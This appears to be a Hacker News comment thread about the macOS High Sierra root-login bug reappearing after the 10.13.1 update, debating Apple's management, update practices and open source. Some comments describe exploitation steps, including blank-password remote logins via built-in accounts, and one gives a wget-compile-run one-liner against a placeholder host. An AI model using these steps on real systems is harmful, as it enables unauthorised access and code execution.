I feel weird reading comments here ranging from excusing the developer to blaming him, for its lack of unit testing or anything. Let’s make this clear : management fcked up badly. Human process. Not code, not unit testing, not a single line of code is responsible. And you know why ? Because when you’ve had the greatest security failure in a decade publicly shaming your company and your team, you personaly make sure it doesn’t happen again in the next release.
And it’s not just one manager. The whole management is screwed, it’s a disaster. I think now is really time to say : would you imagine this happening under steve jobs ?
> Because when you’ve had the greatest security failure in a decade
It's nowhere close to the greatest security failure in a decade. It's not even a contender in the far off distance. It's a well publicized vulnerability, and it's quite silly, but in the scheme of things it's just a Tuesday for CVE writers. We even had a vulnerability functionally identical to this, and similar in both severity and silliness, hit Linux within the past year.
If you're talking about Apple specifically, it's still not that bad. The vulnerability couldn't be arbitrarily executed remotely with default OS settings, and it didn't grant kernel access. The Trident flaws were significantly worse than this, and that's just the first that comes to mind.
Yes, yes, I know this wasn't the thrust of your point...but still. People get kind of hyperbolic when it comes to rating security vulnerabilities. It's more silly than it is severe. I expect at least one vulnerability of comparable impact on every major point release of every major operating system and web browser (not that this is a good thing, but it's logistically realistic). I don't think this is particularly bad for Apple's public image or reputation. Headlines about "the sky is falling!" vulnerabilities make the rounds every so often; for better or worse, it never really seems to stick in public consciousness.
because it doesn’t provide remote access, you’re right. But it’s been released publicly before there was a patch available, on an OS that’s only used as a personal computer, not as a server. And is immediately exploitable by just anyone, with 0 technical background. I think that makes it a very big deal, no matter what CVE usually use for a scale. I also don’t remember any macOS security breach getting that much publicity.
I agree it's a big deal, in that it's serious - it's a security vulnerability after all, yes. But I disagree about its significance for Apple in the face of the sheer number of security advisories that come out across iOS and macOS each year. When we broaden perspective away from just Apple, this becomes absolutely miniscule. There's a lot of navel gazing going on, but there's not a lot of reason to read anything particular out of this at all.
It's very silly, and I would also be embarrassed if I was involved in it, but those aren't good metrics for judging the realistic frequency of bugs like this, nor their severity. I've had vulnerabilities I've reported picked up by a bunch of news media before even though they weren't that serious. As it turns out, the media just latches on to security headlines, and everyone sort of forgets about it except us grumblers on Hacker News, because we Never Forget.
Someone from Google Project Zero has probably been inspired to start fuzzing the macOS at the UI level now, and that's a good thing - they should. But that's about all I'm taking away from this story.
Moreover:
> on an OS that’s only used as a personal computer, not as a server
This makes it less severe, not more so. I'd rather have a Heartbleed impacting nearly every server on the internet than a...whatever we're calling this, impacting every macOS computer in the world. I guess I can make a botnet...except I still have to be local to it in the majority of cases, or do specific targeting, or chain this with another piece of popular, compromised software, etc. It suddenly becomes a bit more complex than just someone pressing enter on a root prompt twice. Plus, if the vulnerability is laughably silly, it's usually easier to find than a chain of them that evidences a systemic misconfiguration in the entire OS.
In fact, I'd posit that the reason this story is getting so much attention is precisely because the vulnerability is so easy to understand, and because someone disclosed it on Twitter. Frankly, the whole situation is really quite funny in a black comedy sort of way. But while it's fun to write stories poking fun at large companies for their silly mistakes, it doesn't meaningfully reflect their security competency or the long term perception of their security competency.
Really I don't mean to trivialize it. It's not a good look, and definitely it's worthy of being patched. But I think it's worth looking at from a much broader perspective.
>> on an OS that’s only used as a personal computer, not as a server
> This makes it less severe, not more so.
You are looking at it from the perspective of a seasoned security professional. It's like looking at the terrorist attack in Nice from a military point of view and saying "eh, this was just a guy on a lorry; it's much more difficult to raid Osama in the middle of Pakistan". That might well be, but this does not matter to the general public - to them, concepts like "botnets" are immaterial, whereas Slippin' Jimmy entering their macbooks to read their emails while they're sleeping is very real.
In that sense, the impact here was bigger than any other security hole ever experienced on the Mac.
I don't really think your analogy is all that apt, but anyway, it just serve's to reinforce dsacco's point: there may have been a lot of fuss over this, but in terms of actual impact, this was negligible.
> I'd rather have a Heartbleed impacting nearly every server on the internet than a...whatever we're calling this, impacting every macOS computer in the world.
I think I must be misunderstanding this, or else the rest of your comment. Did you really mean it this way (more Heartbleeds is better than more personal-OS vulnerabilities), rather than the other way around?
It was, via Screen Sharing and a few other remote mechanisms.
It "likely" wasn't often internet accessible due to firewalls, but it was remotely exploitable on many large Mac deployments in enterprise and education.
You'd still need physical access to a logged-in machine to exploit it. I'm not sure what the latest default is as to Guest accounts and whether or not those can exploit it, but it's a significantly different story if it requires you to exploit it on an unattended logged in machine.
If guest accounts are enabled by default and a guest account can exploit it, yea.. that's pretty bad.
> You'd still need physical access to a logged-in machine to exploit it
Not necessarily; this aspect was unfortunately underreported:
"macos 10.13 bug isn't limited to root in all circumstances; via ARD, you can log in as any existing user (e.g. _applepay) and share the screen of the logged-in user. also _uucp is allowed to log in"
The defaults don't allow for remote management, screen sharing, or SSH or anything. Most of these devices are going to be sold without those options ever being touched.
So that limits things in terms of who is affected.
Just as a very simple, isolated example, think of all the Mac Mini servers with Remote Management enabled at https://macminicolo.net .
As I mentioned below, this remote exploit did NOT require ever logging in as root, whether with or without a password. This was a much more serious bug than is commonly understood.
> None of which makes this statement any less inaccurate: >> You'd still need physical access to a logged-in machine to exploit it.
Yes it does; if Remote Management was enabled (as is often the case for remote servers or mass deployments), an attacker could login via Apple Remote Desktop using default, pre-existing user accounts (_applepay, _uucp, etc) and a blank password without ever needing physical access.
Just tested again with a new, unpatched install of 10.13.1 on one Mac, connecting via Screen Sharing from another. To be clear, I never logged in as root on the 10.13.1 Mac at all, even via the exploit.
You are agreeing with the comment you're replying to. He/she was saying that the defaults being what they are do not make the statement that you need physical access any less inaccurate.
> would you imagine this happening under steve jobs?
Of course it could have. Making software is hard, and mistakes get made. The idea that the magical presence of Steve would prevent this is absurd.
There were plenty of terrible MacOS bugs under Steve's reign too. I can't help but feel there is perhaps a new generation of Mac users who don't remember or didn't experience how painful OS X was at times, even many years after the OS 9 to X transition had started.
Not magical. Fucking terrifying, and uninterested in the management layers designed to insulate any level staff from the consequences of this mistake. Compare Rickover.
OS X versions 1-3 were pretty bad. 10.3 was the first to be useable. 10.4 was actually good. Then 10.5 Leopard (or Leper as we knew it) was awful on release. From Snow Leopard onwards it’s been much better, with the occasional howler of course.
It seems to be a constant refrain that Apple’s software quality is declining in the same way civilisation is always falling or HN is becoming more like reddit.
In High Sierra they painlessly replaced the filesystem. Quite an achievement. Although everyone involved in this latest problem should be highly embarrassed.
> In High Sierra they painlessly replaced the filesystem.
Except that a colleague of mine who was adventurous enough to try it lost all the data. That stopped any one of us from upgrading (fortunately, if I may say so).
(it might be due to encryption, but it doesn't matter - the "painless" part is clearly not for everybody)
In High Sierra they painlessly replaced the filesystem.
No, they did not. They still cannot upgrade any Mac mini server running RAID 1. They sold that configuration and crippled there software to put in the new file system. That is only painless for flash drive owners.
So what pain did it cause you? Your computer is running the new OS, and they’re doing a staged rollout which seems to have caused no problems – that sounds exactly as described.
My computer is not running the new OS since it cannot be upgraded currently. We are upgrading every other Mac (originally for fear of not having the latest security), but cannot do upgrades on a configuration sold by Apple. Their filesystem transition which was accompanied by a down grade of Disk Utility is not painless.
I agree that management fucked up to allow this to happen again. But saying it's purely management's fault is another extreme.
In big companies there are layers of 'management', including down to dev leads and tech/virtual leads who are devs by title. Knowledge of codebase/systems/deployment increases as you get down to the leaves. There are architects, release managers, product managers, etc. that should have provided multiple checks/balances. It's easy to point at "management" in big companies just as it is easy to point at "developers". But there's a whole bunch of nuances in the middle.
> There are architects, release managers, product managers, etc. that should have provided multiple checks/balances. So to say it's purely "management" isn't quite correct to me.
The fact that all the architects, release managers, and product managers that you mentioned do not function as a coherent structure capable of eliminating the occurrence of critical defects is the definition of management failure. NASA also had plenty of architects and directors when Challenger exploded. Such catastrophic failures, especially on repeat, are indicative of systemic disfunction. That is always the fault of top management.
Seriously. It’s shitty, but rebooting isn’t the end of the world. The problem is they don’t force a reboot with the fix. Now they just need to roll a new 10.13.1 with the fix and force a reboot with the standalone patch, problem solved.
What do you mean when you say management fucked up: they don't think it's worth to invest in quality of apple software? This is a decision, not a fuck up.
Can't it be both? I feel like when people talk like this, it abstracts away from the concept of a bad decision. Everything's a tradeoff! Sounds great until you hit actual consequences.
I've been struggling for a long time to convince some of my less technical friends that keeping all of the software on their devices up to date is an important best practice from a security perspective. I'm afraid that the recent muck ups in High Sierra and iOS 11 are going to make sure that some of them never listen to me ever again.
I have a hard time believing that your less technical friends are even following Apple news. The average person that walks into an Apple store and buys a Mac probably has no idea about the original vulnerability, let alone the multiple patches for it.
The average person that updated their iOS to 11 during the first two weeks has definitely noticed how bug-ridden it is with power issues, 3D touch issues, and the autocorrect bug.
We've trained people to update ASAP for security reasons, but when Apple drops the ball and seriously fucks up iOS 11 for a month until 11.1.1 was released, this will keep users update-shy.
I hope 2018 emphasises rock-solid releases for both macOS & iOS. Or Apple should move to a two-year release cycle (wishful thinking).
There is still unfixed IOS 11 introduced bug [1] that kills notification screen which requires powercycle to fix.
Some users hit it multiple times a day.
Maybe they won't be aware of this particular vulnerability but issues like the the iOS autocorrect bugs[1][2] get memed to death on all sorts of mainstream social media platforms. Even the original "root" tweet got 10k+ retweets.
Sure but that's still a far cry from saying that even a significant percentage of the Mac user base is aware of it. Social media moves so fast that there's almost no chance it penetrated the zeitgeist. A big well known flaw was the iOS 8.0.1 update that bricked iPhones. That was pulled within a few hours of it being released but the scale of the iPhone meant that it impacted a large number of people. This is too invisible for anyone to notice.
I hear you, and I have the same problem (hi, Dad) but it is worth noting that this latest re-occurrence of the bug happens only to machines that were not up-to-date when they downloaded (or rather, when Apple remotely installed) the security patch.
If a machine had 10.13.1 (the latest version of macOS) installed when that happened, it is OK.
If the machine had 10.13.0 installed when Apple installed the patch, however, then the update to 10.13.1 will bring the bug back, and necessitate both re-installation of the security patch and a reboot before the machine is again safe from the "root access for anybody who can spell 'root'" bug.
Unfortunately, this is probably not going to convince non-stop technical people who already are hesitant to listen to sound advice about updating; at least the people like this who I know will just hear "the update broke things" and take that as confirmation of what they already believed.
I never upgrade immediately. Still on Sierra. I need my machine for work. I can't justify being an Apple beta testing guinea-pig. Once i know it's stable and /or all the major problems that could affect me are at least known if not fixed then i will upgrade. Anything else is reckless. Nothing wrong with applying security patches on the old os as needed.
One problem is that Apple did NOT release a security update for older systems along with 10.12.0 and 10.13.0. Only when 10.12.1 and 10.13.1 came out did they publish patches for earlier revisions. That gives everyone a choice between using a .0 release (ouch) and running an unpatched OS for about a month.
macOS High Sierra 10.13.0 was released on 2017-09-25. Sierra (10.12 and El Capitan (10.11) were not patched on that day. So if you didn't upgrade to 10.13.0 _on the first day of its availability_, you were missing out on these security fixes: https://support.apple.com/de-de/HT208144
The same pattern happened when 10.12.0 was released - older systems only started receiving security fixes on the day 10.12.1 was released.
So it is generally true that Apple keeps the three most recent versions of macOS secure, but there's always this awkward gap around September where they don't.
See my answer to the sibling post. I'm not sure what to recommend. When 10.14 comes out, we'll probably have to read the KB article to evaluate whether the security fixes are so important that we should install 10.14.0 immediately (no matter how buggy it may be).
This doesn't apply to iOS. If new iOS version come out, you should update immediately so you can test if it fit your comfort.
If not, you have very limited window to come back to previous major (and hopefully still secure) version of iOS.
If you miss this window, you have two options - stay on older version waiting till new version get fixed all annoying bugs (hello iOS 11), or if you already on newer version, you're screwed - no coming back.
For this reasons I stared upgrading to newer iOS versions as soon as they are available.
And this is the real long lasting problem with Apple’s shoddy software quality of late. Nobody I know updates their software anymore because they don’t trust that the update won’t ruin something. I personally have always updated my software religiously but even I won’t do that on my iPhone anymore. And now the only option they have to close security vulnerabilities is to force updates...and when you force it, brand loyalty is gonna take a hit.
I always install security updates as soon as they are released but I do not and I advise my friends not to upgrade to the latest major release right when it's been released.
I still remember the update to el capitan destroying my filevault with all my files (luckily I had backup). Recent major releases from OS X introduce regressions and are bug ridden for the first 6 months.
I generally stay 1 release behind (kept patched) for this reason, plus ensuring my workflow is not broken for a few months of the year.
The latest version isn't always the most stable or secure, either.
Someone had mentioned in a different post that Apple may not apply all security patches to Sierra. If I can find some support to this I think it will be picking the lesser of two evils.
Judging by Apple's security updates page[1], they're still releasing standalone security updates for older versions of macOS. Unfortunately, the same is not true for iOS where security updates are rolled into OS updates.
Apple used to release a security update for revision N-1 and N-2 every time the current release got a point upgrade. However, 10.12.0 and 10.13.0 were both released on their own. Only when 10.12.1 and 10.13.1 were released did older systems get patched.
So every time a new macOS release comes out, everyone has the choice between running a .0 release, or running an insecure OS for about a month.
Do you have any clue how to subscribe to security updates only on OS X? Looking for OS updates simply suggests downloading High Sierra, but my work laptop has to stay on El Capitan for dependency reasons.
I hear you! I have resorted to "wait for a month or two, and then update". Usually a few point updates are available by then. Explaining security to my family and friends doesn't work (most think passowrd managers and autofill are a bigger security hole than using same password everywhere).
Updates do two things. They repair old bugs, and they introduce new bugs, often called features. It would be great if you could subscribe to just the former, but the idea that it is uniformly better to update seems absurd to me.
From a user perspective, I never want my experience to change without my express consent. Sometimes I don't have the power to prevent it, but for my OS, I definitely have that power, and exercise it regularly.
As the memorable quote goes, "Updates are like vaccinations that have a large chance of making you grow an extra 3 ears, lose one eye, and turn your skin bright green."
Updates to fix specific and very important bugs are good. Updates that do more are not. Unfortunately, I have often pondered how to solve this problem, and come to the conclusion that it's not easy --- but perhaps if almost all the users take a stand and just do not update whenever it's not for the specific and sole purpose of fixing some important bug, even if it means leaving security behind, maybe companies will finally listen and stop making security an excuse to bundle in other unwanted changes; because then they'll know that any attempts to do so will be met with high resistance, and if their goal was to secure, they would only fix these security issues and leave everything else alone.
Although it's not Apple, the sentiment around Windows Vista and 8.x show that companies do care about their customers to some extent; but they're not going to care if the majority of users just slavishly accept whatever they get.
And they typically replace working systems that you're used to with broken systems with a lot of new eye candy thrown in for no other reason than to be more modern looking totally throwing off any kind of muscle memory and familiarity.
"Hey sumitgt, how do I get $software to work? I bought it for $79 on sale but it won't open."
> iPad
"Hey sumitgt, can you help me get $university's site to work? I need to turn in my homework before midnight, but the page says something about Internet Explorer and Adobe Flash."
I guess that is the case in a lot of places.
But things are changing and quickly as well.
These devices are fashionable so adoption of them comes from edicts up top to IT.
Microsoft has been pushing the office online suite a lot in universities and businesses.
Also went to university a number of years ago and they used simple HTML file upload stuff for turnins of coursework.
Generally I’ve noticed more bugs on High Sierra than on previous OSX releases. Things ranging from UI glitches to freezing safari to random slowdowns - all across multiple different machines.
Coupled with the security issues it’s clear that whoever is responsible for Q&A these days is asleep at the wheel.
It’s the reliability of the hardware and software that brought me to Apple back in the days of the G4.
Ironic that I may have to switch back to Windows since my work machine seems less buggier than my Mac!
Win 10 has its fair share of bugs, tbf. In fact win 10 feels like a Google product that never leaves beta. There will always be glitches and weird stuff. Some things have become very good over several iterations. But there are a ton of new stuff they keep adding and all of those are half baked until the next big release.
The worst thing about Windows 10 is there’s a mandatory, automatic OS upgrade every few months, which Microsoft pretend is simply an update. This can and will break things every single time.
Incredibly my El Capitan -> High Sierra update went smoothly and fixed the abhorrent wifi problems I had had forever—however that was the only reason I wanted to upgrade. macOS has not been evolving for a while. I miss the Leopard days.
iOS 11 on the other hand was more of a downgrade to beta on my 7 Plus.
What WiFi problems would those be? I'm sitting on Sierra for now, but my laptop has been refusing to connect to a network automatically 95% of the time on wake. Now I'm wondering if it's worth braving High Sierra for a fix to it.
The connection would stay open but after a few minutes the ping would fail. I had even setup a wifi reset script to get back to working 20 times a day. It did it only on some routers, even if I connected to them through my old AirPort Express.
Maybe they now feel less important or proud. Whatever the case, it's not up to you to police this commenter's thoughts. Why did you decide to take time and energy to post a dictionary definition in attempt to do so? This just feels almost completely patronizing.
LPE matters a lot for enterprise and educational customers.
What do you mean by exploited from within the sandbox? This is exploitable from any login prompt where the user has the ability to enter a username, including ones in the shell.
>LPE matters a lot for enterprise and educational customers.
Surely not. In real life LPE bugs are far too common to matter a lot to anyone.
>What do you mean by exploited from within the sandbox? This is exploitable from any login prompt where the user has the ability to enter a username, including ones in the shell.
I'm not familiar enough with the OS X sandbox, but I would guess that sandboxed applications aren't allowed to fill in login prompts. I might be wrong though.
>I'm not familiar enough with the OS X sandbox, but I would guess that sandboxed applications aren't allowed to fill in login prompts. I might be wrong though.
Oh, right. I tend to kind of forget that the App Store serves any other purpose than to deliver software updates as most of the applications on my Mac are from other sources. Yes, I agree that sandboxed apps are almost certainly prohibited from filling in login prompts by default. There does appear to be a system by which sandboxed apps can ask for addition permissions but I'm not an OS X/macOS application developer so I have no idea how this permissions system works.
>Surely not. In real life LPE bugs are far too common to matter a lot to anyone.
LPE bugs might be common but they're rarely as extremely straightforward as typing "root" into a login prompt with no password and pressing enter a few times.
>LPE bugs might be common but they're rarely as extremely straightforward as typing "root" into a login prompt with no password and pressing enter a few times.
Often enough a `wget http://xxx.xxx/xxx.c&&gcc xxx.c&&./a.out` will suffice. I'm not convinced that the ease of exploitation makes this bug particularly serious as a LPE.
LPE's are very serious for the countless college campuses, public libraries, and design print shops like Kinkos that offer public access to Mac computers.
Why is that significantly more serious than them running any other backdoor as a normal user?
I don't understand the threat model here, it is always completely unreasonable to expect that an attacker wouldn't easily be able to escalate privileges locally in a multi-user system.
Summary: the root bug reappears when you upgrade your Mac. You need to manually reinstall Apple's security patch and reboot. There's no warning that a reboot is necessary.
Huh, and how do I reinstall the patch? Can't find a downloading link and app store doesn't let me do anything with the update
Funny thing is that on the update site section steps in `To confirm that your Mac has Security Update 2017-001` confirm that I have the update, but am still vulnerable to the issue.
Do I understand correctly that setting root password is also valid workaround for the issue?
Apple can claim it is "certified" as UNIX(TM). And publish the source for userland code it copied from open source projects.
Microsoft is trying again to subsume "UNIX" into Windows allowing users to run Linux binaries without running a Linux kernel.
But neither is a substitute for the original open source UNIX-like projects.
This blunder by Apple proves that even the wealthiest company on Earth does not necessarily produce better "UNIX" than a group of unpaid volunteers. At least if the user cares about the basics.
I am still confused. I was prompted again today to install the security update I installed yesterday. Did they silently release another improved security update?
Yeah, the day after they put out the initial update (17B1002), they put out a second update (17B1003) that fixed the file sharing issue caused by the first one.
sounds like a typical extra-super-hyper-important-emergency effort under the constant gaze from the very top through the thick E/S/VP/etc. layers of CYA mediocrity eager to report up the successful completion of a glorious effort to the glorious leader in a typical BigCo where engineering culture is faltering while nobody who matters cares (or even able to care) Well, at least it was that way back at Sun :) ... Or may be it was just a one bad day at Apple. Though many people like to argue that engineering culture is exactly to prevent the "bad" days from happening...
after i first time last year (our BigCo like any other BigCo likes SUSE and that one isn't fast on bringing in new changes) faced GNOME 3, i was wonderstruck at the engineering feat what it is ( no joking, great engineering achievement, just for different world, and it took some effort to downgrade back to GNOME 2). Seeing GNOME 3 made me completely sure that Linux desktop of our dreams just isn't coming.
It appears the problem is that the fixes included in the security updated were not backported to 10.13.1 which caused a problem for users coming from 10.13.0 that had done the security update. Certainly a huge issue, but many commenters seem to misunderstand the article.
Everybody can have a bug. Even a bad one. In fact, virtually every system does have a doozy now and then. But recently with Apple it looks like they are serving them constantly lately. Shame for this to happen to the company that once could be pointed at as an example of somebody who gets how to make a professional Unix-based desktop.
This is turning into a comedy of errors. They don't add regression tests to their test suite? I'm a bit shocked that they're having so much trouble releasing a patch properly.
Wow, so now they have this massive security bug, screwed up file sharing when they fixed it, and now are apparently inadvertently rolling back the fix to the initial massive security bug.
With all the pressure to produce novelty gimmicks, it's a little unsurprising :/ and unfortunate, I'm a huge fan of osx. It's nice to have a commercially supported unix system that also has a decent UI.
Not a good week for Apple. They were doing pretty good reputation wise when it concerned security so far but this whole saga has been less than stellar. Amazing that regression testing didn't catch this.
Looks like Apple is having trouble hitting deadlines this year. iOS 11, Xcode9, OS X all came out rushed. Maybe because they're moving to the new building. Or maybe they're trying to do to much stuff on a yearly release cycle now.
Not regretting my decision to always be one major release behind. At this point, I simply don’t trust Apple enough to install updates without breaking my system and interrupting my work.
For something as serious as the initial bug (especially given it was all over the press) there should have been regression tests for this.
Either deployment was broken, the tests were broken, there weren't tests, or multiple of the above :\ anyway I'm hypothesizing but would love to see a post-mortem on this. How does a generally reliable company like Apple screw this up twice?
Heck, I was responsible for the first crashing bug found in System 7.0. It was found about six hours after GM images were released to manufacturing. It was a crashing bug. It was remotely exploitable. It was one freakin' register, for cryin' in your cornflakes.
I’ve not seen this mentioned anywhere but Apple installed the security update without my permission which made me feel both sad and unsurprised that they have effectively back doors that can run code on my machine with impunity.
Will try for a Linux dev machine next time I think.
One hesitates to comment on this sequence of events because it speaks for itself. But here is a stupid user opinion (mine):
I believe users place too much trust in corporations such as Apple, Google or Microsoft to protect them. There is too much debate over which company to choose ("I like ___________'s approach to security") instead of questioning whether delegating security to any of them is truly the wisest course of action.
I hope that this incident causes at least one user to question whether users might benefit from adopting a less trusting and more vigilant approach to protecting their data.
And by "vigilant" I do not mean "choosing the right tech companies to trust", diligently installing updates from these corporations and feeling self-satisfied.
I mean questioning the status quo and thinking seriously about the benefits of free, open source operating systems that are potentially reviewable by millions of developers and users. Systems that can be modified, compiled and installed easily by anyone, not only by small groups of people in corporations with special knowledge. Systems that can, e.g., permit and maybe encourage "safer", more conservative usage patterns.
Under the prevailing laws, I believe this pool of open source developers and users will always contain a larger number of people who care more about protecting user data than any groups within the above companies. It is a matter of self-interest.
Apple is a company with seemingly infinite resources at its disposal. But clearly in this case there were more people seriously interested in fixing this vulnerability outside of the company than within it. And as a dumb, naive user, I question anyone who would suggest that no one except a small group of people at Apple would be competent to do this work.
IMO, this mistake had nothing to do with what makes Apple valuable, namely their hardware. A UNIX-like OS running on Apple hardware does not need to be proprietary and, IMO, users have a compelling interest for software, that can expose their data and pose other security issues, to be open.
I'm always a bit skeptical of this argument as a rationale for FOSS.
Of course, publishing your source code does make it a lot easier for outsiders to audit your software, but how many people actually do? Linux might be an exception because so many organizations build drivers and distributions for it (there are always people digging through the internals and likewise, hackers/security consultants looking for opportunities), but I suspect for most open source projects (even the big ones), there are way fewer people auditing them than comments like this would lead you to believe.
How many people do you think are digging through and critically analyzing Django/Node/Rails/Docker/OpenSSL/network drivers/etc? There's a mindblowing amount of code behind any application, and as developers/users, we tend to trust strength in numbers - people are using it, so it must be fine. But in practice, I wonder how much the bystander effect counteracts this intuition.
>publishing your source code does make it a lot easier for outsiders to audit your software, but how many people actually do?
I would say very, very few people in the world read random source code looking for bugs. Finding hidden bugs requires active use like a QA person would do. This has probably already been done on any major FOSS software, so any remaining bugs would be unbelievably hard to find, and very unlikely by just reading source code.
I mean it sounds good as a theory, but it also sounds like, "If I publish my book online for free, lots of people on the internet will read it."
Sorry I ninja edited above. I see your point upon reflection - we’re talking about other dimensions of open source (eg. popular and trusted), not the availability of the code.
And it’s not just one manager. The whole management is screwed, it’s a disaster. I think now is really time to say : would you imagine this happening under steve jobs ?